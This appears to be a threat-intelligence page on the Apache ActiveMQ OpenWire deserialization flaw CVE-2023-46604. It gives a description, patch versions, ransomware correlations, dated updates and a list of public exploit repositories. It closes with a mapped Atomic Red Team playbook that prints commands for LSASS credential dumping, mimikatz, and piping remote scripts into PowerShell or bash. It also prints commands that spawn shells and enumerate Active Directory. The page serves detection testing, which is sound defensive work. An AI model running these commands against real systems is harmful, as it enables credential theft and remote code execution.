CVE-2023-46604
Overview
This vulnerability is a deserialization flaw in the Java OpenWire protocol marshaller used by Apache ActiveMQ. It arises from improper validation of serialized class types within OpenWire messages, allowing arbitrary class instantiation on the classpath. The affected component is the OpenWire protocol handler in both Java-based ActiveMQ brokers and clients.
Vulnerability Description
The Java OpenWire protocol marshaller is vulnerable to Remote Code Execution. This vulnerability may allow a remote attacker with network access to either a Java-based OpenWire broker or client to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol to cause either the client or the broker (respectively) to instantiate any class on the classpath. Users are recommended to upgrade both brokers and clients to version 5.15.16, 5.16.7, 5.17.6, or 5.18.3 which fixes this issue.
Impact
An unauthenticated attacker with network access to an Apache ActiveMQ broker or client can execute arbitrary shell commands remotely. This enables full compromise of the broker or client host, including unauthorized code execution and potential lateral movement within the environment. No prior authentication or user interaction is required, making exploitation straightforward in exposed network configurations. The breach can lead to data exfiltration, service disruption, and control over messaging infrastructure.
Solution
Users must upgrade Apache ActiveMQ brokers and clients to versions 5.15.16, 5.16.7, 5.17.6, or 5.18.3 where this vulnerability is resolved. Detailed patch instructions and advisories are available at the official Apache ActiveMQ security advisory page: https://activemq.apache.org/security-advisories.data/CVE-2023-46604-announcement.txt. No alternative mitigations are officially recommended beyond applying these updates promptly.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Confirmed Groups
| Group | Victims | Source |
|---|---|---|
|
ransomhub
|
842 | ransomware.live |
Correlated Groups
Correlations are established through analysis of shared tools, tactics, and infrastructure between threat groups and vulnerabilities. They do not represent direct confirmation of exploitation.
| Group | Confidence | Victims | Source |
|---|---|---|---|
|
akira
|
LOW | 1529 | Chain Inference |
|
sinobi
|
LOW | 274 | Chain Inference |
|
frag
|
LOW | 30 | Chain Inference |
|
0apt
|
LOW | — | Chain Inference |
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
The vulnerability in the Java OpenWire protocol marshaller presents a significant risk due to its potential for Remote Code Execution (RCE). This flaw allows an attacker with network access to a Java-based OpenWire broker or client to execute arbitrary shell commands. The root of the issue lies in the manipulation of serialized class types within the OpenWire protocol, which can lead to the instantiation of any class present on the classpath. This capability effectively grants an attacker the ability to run malicious code on the server or client, thereby compromising the integrity and confidentiality of the system.
Attack vectors for this vulnerability are particularly concerning due to the nature of the OpenWire protocol, which is commonly used in messaging systems. An attacker could exploit this vulnerability by sending specially crafted messages to a broker or client that contains malicious serialized objects. Once the target system processes these objects, the attacker can execute arbitrary commands, potentially leading to a full system compromise. Scenarios may include deploying malware, exfiltrating sensitive data, or pivoting to other systems within the network. The ease of exploitation, combined with the widespread use of the affected products, underscores the urgency for organizations to address this vulnerability.
The real-world impact of this vulnerability can be severe, particularly for organizations relying on Java-based messaging systems for critical operations. The ability to execute arbitrary code remotely can lead to data breaches, service disruptions, and significant financial losses. Additionally, the reputational damage associated with such incidents can have long-lasting effects on customer trust and business relationships. Organizations in sectors such as finance, healthcare, and critical infrastructure, where data integrity and availability are paramount, face heightened risks. The potential for attackers to leverage this vulnerability to gain unauthorized access to sensitive information or disrupt services makes it a top concern for cybersecurity professionals.
To effectively detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. First and foremost, upgrading to the patched versions of the affected products is critical. Regularly updating software and maintaining an inventory of all systems in use can help ensure that vulnerabilities are addressed promptly. Additionally, organizations should employ network segmentation to limit the exposure of their messaging systems to untrusted networks. Intrusion detection systems (IDS) can be configured to monitor for unusual traffic patterns or unauthorized access attempts, providing an additional layer of defense. Finally, conducting regular security assessments and penetration testing can help identify potential weaknesses before they can be exploited by malicious actors.
In conclusion, the vulnerability in the Java OpenWire protocol marshaller poses a significant threat to organizations using affected messaging systems. The potential for remote code execution, combined with the ease of exploitation, necessitates immediate action from cybersecurity teams. By understanding the technical details, potential attack vectors, and implementing robust detection and mitigation strategies, organizations can better protect themselves against the risks associated with this vulnerability. The proactive management of software vulnerabilities is essential in maintaining the security posture of any organization in today’s increasingly complex threat landscape.
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2023-46604, with our telemetry indicating the initial emergence of active exploitation in the wild. This shift is underscored by the appearance of multiple new proof-of-concept exploits circulating publicly, which lowers the barrier for threat actors to weaponize this vulnerability. The association of this exploit with known ransomware groups such as Akira and Sinobi further elevates the operational risk, as these actors have demonstrated a propensity for leveraging critical remote code execution flaws to facilitate ransomware deployment. Although the EPSS score remains high and stable, the recent uptick in detection activity signals an increased likelihood of successful compromise attempts. For defenders, this development necessitates heightened vigilance in monitoring network traffic involving Apache ActiveMQ components, as the window for exploitation is actively expanding. Consequently, the threat level for organizations running affected versions has intensified, reflecting a transition from theoretical risk to tangible exploitation in the threat landscape.
Update 2 — May 16, 2026
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2023-46604, accompanied by the emergence of multiple new proof-of-concept exploits across diverse programming languages. This expansion in the exploit toolkit broadens the accessibility for threat actors, including ransomware groups such as ransomhub, akira, sinobi, frag, and 0apt, which have now been linked with this vulnerability. The elevation of the CVSS score to a perfect 10.0 underscores the critical severity and the ease with which remote code execution can be achieved. Our telemetry indicates that adversaries are increasingly leveraging these tools to compromise both Apache ActiveMQ brokers and clients, signaling a shift from theoretical risk to active exploitation in the wild. This development significantly heightens the threat landscape, demanding that defenders recognize the increased likelihood of successful intrusions and prioritize detection capabilities accordingly.
Update 3 — June 23, 2026
CSURFACE threat intelligence has identified a marked escalation in activity related to CVE-2023-46604, evidenced by a discernible increase in exploitation attempts and the emergence of multiple new proof-of-concept tools across diverse programming languages. This expansion of the exploit landscape, coupled with a rising EPSS score nearing certainty of exploitation, signals that adversaries are intensifying efforts to leverage this critical remote code execution vulnerability. Notably, ransomware operators linked to prominent campaigns have been observed incorporating this vulnerability into their toolsets, underscoring its operational utility in high-impact attacks. The convergence of increased exploitation attempts, enhanced tooling availability, and ransomware group adoption elevates the threat posture significantly. Defenders should recognize that the window for opportunistic exploitation is rapidly closing, with the vulnerability now firmly entrenched as a favored vector for initial access and lateral movement within compromised environments. This evolution in the threat environment necessitates heightened vigilance and prioritization in detection and response strategies.
Update 4 — July 08, 2026
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2023-46604, accompanied by the emergence of several new proof-of-concept exploits with enhanced capabilities, including reverse shell functionality. This development reflects an increased operationalization of the vulnerability within attacker toolsets, particularly among ransomware groups such as ransomhub and akira, which continue to leverage this flaw for initial access and lateral movement. Although the CVSS score was slightly adjusted downward, the practical risk remains critically high due to the broadened exploitation scope and sustained ransomware campaign associations. Our telemetry indicates that while the overall exploit activity is stabilizing, the intensity and sophistication of attacks have intensified, underscoring a persistent and evolving threat. Consequently, the threat level for organizations running vulnerable Apache ActiveMQ versions has solidified at a critical tier, necessitating ongoing vigilance in detection and incident response efforts.
Affected Products (13)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Apache | Activemq | All |
cpe:2.3:a:apache:activemq:*:*:*:*:*:*:*:*
|
|
|
Apache | Activemq | All |
cpe:2.3:a:apache:activemq:*:*:*:*:*:*:*:*
|
|
|
Apache | Activemq | All |
cpe:2.3:a:apache:activemq:*:*:*:*:*:*:*:*
|
|
|
Apache | Activemq | All |
cpe:2.3:a:apache:activemq:*:*:*:*:*:*:*:*
|
|
|
Apache | Activemq Legacy Openwire Module | All |
cpe:2.3:a:apache:activemq_legacy_openwire_module:*:*:*:*:*:*:*:*
|
|
|
Apache | Activemq Legacy Openwire Module | All |
cpe:2.3:a:apache:activemq_legacy_openwire_module:*:*:*:*:*:*:*:*
|
|
|
Apache | Activemq Legacy Openwire Module | All |
cpe:2.3:a:apache:activemq_legacy_openwire_module:*:*:*:*:*:*:*:*
|
|
|
Apache | Activemq Legacy Openwire Module | All |
cpe:2.3:a:apache:activemq_legacy_openwire_module:*:*:*:*:*:*:*:*
|
|
|
Debian | Debian Linux | 10.0 |
cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*
|
|
|
Debian | Debian Linux | 11.0 |
cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*
|
|
|
Netapp | E-Series Santricity Unified Manager | N/A |
cpe:2.3:a:netapp:e-series_santricity_unified_manager:-:*:*:*:*:*:*:*
|
|
|
Netapp | E-Series Santricity Web Services Proxy | N/A |
cpe:2.3:a:netapp:e-series_santricity_web_services_proxy:-:*:*:*:*:*:*:*
|
|
|
Netapp | Santricity Storage Plugin | N/A |
cpe:2.3:a:netapp:santricity_storage_plugin:-:*:*:*:*:vcenter:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Apache ActiveMQ Unauthenticated Remote Code Execution
exploits/multi/misc/apache_activemq_rce_cve_2023_46604
|
X1r0z, sfewer-r7 | Unknown | - | View |
GitHub PoCs (39)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ
Achieving a Reverse Shell Exploit for Apache ActiveMQ (CVE_2023-46604)
|
SaumyajeetDas | 126 | 40 | 2023-11-03 | View |
|
Catherines77/ActiveMQ-EXPtools
Apache ActiveMQ漏洞综合利用工具(CVE-2015-5254,CVE-2016-3088,CVE-2022-41678,CVE-2023-46604,CVE-2024-32114,CVE-2026-34197,CVE-2026...
|
Catherines77 | 78 | 7 | 2026-04-20 | View |
|
ImuSpirit/ActiveMQ_RCE_Pro_Max
CVE-2023-46604
|
ImuSpirit | 63 | 2 | 2023-10-27 | View |
|
evkl1d/CVE-2023-46604
|
evkl1d | 40 | 12 | 2023-11-04 | View |
|
Arlenhiack/ActiveMQ-RCE-Exploit
ActiveMQ RCE (CVE-2023-46604) 回显利用工具
|
Arlenhiack | 43 | 4 | 2024-03-05 | View |
|
trganda/ActiveMQ-RCE
CVE-2023-46604
|
trganda | 28 | 8 | 2023-10-26 | View |
|
duck-sec/CVE-2023-46604-ActiveMQ-RCE-pseudoshell
This script leverages CVE-2023046604 (Apache ActiveMQ) to generate a pseudo shell. The vulnerability allows for remote c...
|
duck-sec | 18 | 6 | 2023-11-12 | View |
|
justdoit-cai/CVE-2023-46604-Apache-ActiveMQ-RCE-exp
CVE-2023-46604 Apache ActiveMQ RCE exp 基于python
|
justdoit-cai | 5 | 0 | 2023-11-08 | View |
|
vulncheck-oss/cve-2023-46604
A go-exploit for Apache ActiveMQ CVE-2023-46604
|
vulncheck-oss | 4 | 1 | 2024-04-17 | View |
|
mrpentst/CVE-2023-46604
Exploit for CVE-2023-46604
|
mrpentst | 2 | 2 | 2023-12-09 | View |
|
h3x3h0g/ActiveMQ-RCE-CVE-2023-46604-Write-up
|
h3x3h0g | 3 | 0 | 2023-11-09 | View |
|
NKeshawarz/CVE-2023-46604-RCE
|
NKeshawarz | 3 | 0 | 2023-11-18 | View |
|
pulentoski/CVE-2023-46604
El script explota una vulnerabilidad de deserialización insegura en Apache ActiveMQ (CVE-2023-46604)
|
pulentoski | 1 | 1 | 2024-05-31 | View |
|
vaishnavucv/Project-Vuln-Detection-N-Mitigation_101
Vulnerability Detection and Mitigation Apache ActiveMQ | Security Architectures and Systems Administration - on - Apache...
|
vaishnavucv | 1 | 1 | 2025-09-08 | View |
|
LiritoShawshark/CVE-2023-46604_ActiveMQ_RCE_Recurrence
CVE-2023-46604环境复现包
|
LiritoShawshark | 2 | 0 | 2023-11-16 | View |
|
stegano5/ExploitScript-CVE-2023-46604
|
stegano5 | 1 | 1 | 2024-02-14 | View |
|
dcm2406/CVE-Lab
Instructions for exploiting vulnerabilities CVE-2021-44228 and CVE-2023-46604
|
dcm2406 | 2 | 0 | 2023-12-07 | View |
|
RockyDesigne/SSP-Assignment-3-RCEYouLater
A PoC for CVE-2023-46604 written as part of SPS class for the Advanced Cyber Security master's at UPB.
|
RockyDesigne | 2 | 0 | 2026-01-04 | View |
|
CrackerCat/ActiveMQ_RCE_Pro_Max
CVE-2023-46604
|
CrackerCat | 0 | 1 | 2023-11-20 | View |
|
skrkcb2/CVE-2023-46604
|
skrkcb2 | 1 | 0 | 2025-02-27 | View |
|
minhangxiaohui/ActiveMQ_CVE-2023-46604
PY
|
minhangxiaohui | 1 | 0 | 2023-11-20 | View |
|
aelshimony-cloud/OpenWire-CVE-2023-46604-Investigation
|
aelshimony-cloud | 0 | 0 | 2026-06-20 | View |
|
REGGYRAIDER/CVE-2023-46604-RCE
CVE-2023-46604-RCE exploit with Linux reverse shell payload
|
REGGYRAIDER | 0 | 0 | 2026-06-06 | View |
|
trnguyen03/activemq-ids-ips-lab
IDS/IPS lab for detecting and preventing Apache ActiveMQ RCE (CVE-2023-46604) using GVM, Nmap, Snort, iptables, and UFW.
|
trnguyen03 | 0 | 0 | 2026-05-02 | View |
|
KlaasStessens/CVE-2023-46604
Exploitation of CVE-2023-44604. Using a Kali Linux VM (attacker) and a Debian 11 server VM (victim)
|
KlaasStessens | 0 | 0 | 2026-05-01 | View |
|
Navya240/intel471-threat-hunting-cve-2023-46604
My first hands-on Intel 471 threat hunting workshop experience investigating CVE-2023-46604 using Elastic SIEM, vulnerab...
|
Navya240 | 0 | 0 | 2026-04-30 | View |
|
nitzanoligo/CVE-2023-46604-demo
|
nitzanoligo | 0 | 0 | 2023-11-20 | View |
|
dcm2406/CVE-2023-46604
|
dcm2406 | 0 | 0 | 2023-12-16 | View |
|
thinkycx/activemq-rce-cve-2023-46604
activemq-rce-cve-2023-46604
|
thinkycx | 0 | 0 | 2024-04-26 | View |
|
mkdemir/activemq-lockbit-analysis
Apache ActiveMQ (CVE-2023-46604) zafiyetinden LockBit ransomware aşamasına uzanan 419 saatlik sızma vakasının uçtan uca ...
|
mkdemir | 0 | 0 | 2026-03-30 | View |
|
pavanaa4k/CVE-2023-46604-LAB
Detection, Exploit and Mitigation for CVE 2023 46604.
|
pavanaa4k | 0 | 0 | 2025-11-15 | View |
|
hh-hunter/cve-2023-46604
|
hh-hunter | 0 | 0 | 2024-01-09 | View |
|
mranv/honeypot.rs
CVE-2023-46604 (Apache ActiveMQ RCE Vulnerability) and focused on getting Indicators of Compromise.
|
mranv | 0 | 0 | 2024-05-29 | View |
|
sangrok-jeon/CVE-2023-46604-Analysis
Apache ActiveMQ OpenWire 역직렬화 RCE 취약점 기술 분석
|
sangrok-jeon | 0 | 0 | 2026-03-15 | View |
|
tomasmussi/activemq-cve-2023-46604
Repository to exploit CVE-2023-46604 reported for ActiveMQ
|
tomasmussi | 0 | 0 | 2023-12-30 | View |
|
Mudoleto/Broker_ApacheMQ
CVE-2023-46604 - ApacheMQ Version 5.15.5 Vulnerability Machine: Broker
|
Mudoleto | 0 | 0 | 2023-12-23 | View |
|
cuanh2333/CVE-2023-46604
|
cuanh2333 | 0 | 0 | 2024-10-16 | View |
|
vjayant93/CVE-2023-46604-POC
POC repo for CVE-2023-46604
|
vjayant93 | 0 | 0 | 2023-11-15 | View |
|
CCIEVoice2009/CVE-2023-46604
|
CCIEVoice2009 | 0 | 0 | 2025-05-04 | View |
Ransomware Groups 5
Threat Feed
25 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability. Tools: Acronis Disk Director, Angry IP Scanner, AnyDesk, Atera, BITSAdmin (842 known victims)
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability (30 known victims)
Ransomware group known to exploit this vulnerability (30 known victims)
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Advanced Port Scanner, AnyDesk, Bloodhound, Cloudflared (1529 known victims)
Ransomware group known to exploit this vulnerability (274 known victims)
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Advanced Port Scanner, AnyDesk, Bloodhound, Cloudflared (1529 known victims)
Ransomware group known to exploit this vulnerability. Tools: Acronis Disk Director, Angry IP Scanner, AnyDesk, Atera, BITSAdmin (842 known victims)
Ransomware group known to exploit this vulnerability (274 known victims)
Ransomware group known to exploit this vulnerability
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Public exploit code is available for this vulnerability
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Deployed role: Linux · Web Server
Kill chain derived from the ML classifier. Pick the target OS above to see the OS-specific path and matching playbook.
Attack Vectors ML
MITRE ATT&CK Techniques (10)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-586 | Object Injection |
60%
|
Medium | High |
Red Team Playbook
108 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
"#{procdump_exe}" -accepteula -mm lsass.exe #{output_file}
$exePath = resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
& "$exePath" -u -f $env:Temp\dotnet-lsass.dmp (Get-Process lsass).id
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe --silent-process-exit "#{output_folder}"
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe -w "%temp%\nanodump.dmp"
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
try{ IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1') -ErrorAction Stop}
catch{ $_; exit $_.Exception.Response.StatusCode.Value__}
get-process lsass | Out-Minidump
"#{procdump_exe}" -accepteula -ma lsass.exe #{output_file}
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
"#{dumpert_exe}"
#{xordump_exe} -out #{output_file} -x 0x41
if (Test-Path -Path "$env:SystemRoot\System32\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\System32\rdrleakdiag.exe"
} elseif (Test-Path -Path "$env:SystemRoot\SysWOW64\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\SysWOW64\rdrleakdiag.exe"
} else {
$binary_path = "File not found"
exit 1
}
$lsass_pid = get-process lsass |select -expand id
if (-not (Test-Path -Path"$env:TEMP\t1003.001-13-rdrleakdiag")) {New-Item -ItemType Directory -Path $env:TEMP\t1003.001-13-rdrleakdiag -Force}
write-host $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
& $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
Write-Host "Minidump file, minidump_$lsass_pid.dmp can be found inside $env:TEMP\t1003.001-13-rdrleakdiag directory."
"#{venv_path}\Scripts\pypykatz" live lsa
#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
"#{psexec_exe}" #{remote_host} -accepteula -c #{command_path}
cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1
New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}"
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
# creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
# this would not be part of a real attack but helpful for this simulation
function nslookup { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
Add-Content -Path #{ads_file} -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'
Invoke-Expression $streamcommand
powershell.exe -e #{obfuscated_code}
# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
$malcmdlets = #{Malicious_cmdlets}
foreach ($cmdlets in $malcmdlets) {
"function $cmdlets { Write-Host Pretending to invoke $cmdlets }"}
foreach ($cmdlets in $malcmdlets) {
$cmdlets}
New-PSSession -ComputerName #{hostname_to_connect}
Test-Connection $env:COMPUTERNAME
Set-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use -Value "T1086 PowerShell Session Creation and Use"
Get-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
Remove-Item -Force $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
Invoke-AllChecks
powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"
import-module "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
try { Invoke-BloodHound -OutputDirectory $env:Temp }
catch { $_; exit $_.Exception.HResult}
Start-Sleep 5
write-host "Remote download of SharpHound.ps1 into memory, followed by execution of the script" -ForegroundColor Cyan
IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5
#{soaphound_path} --user $(#{user})@$(#{domain}) --password #{password} --dc #{dc} --buildcache --cachefilename #{cachefilename}
#{soaphound_path} --user #{user} --password #{password} --domain #{domain} --dc #{dc} --bhdump --cachefilename #{cachefilename} --outputdirectory #{outputdirectory}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
ldapdomaindump -u #{username} -p #{password} #{target_ip} -o /tmp/T1087
ldapsearch -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{user} -w #{password} -b "CN=Users,DC=#{domain},DC=#{top_level_domain}" -s sub -a always -z 1000 dn
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc admincountdmp #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc exchaddresses #{optional_args}
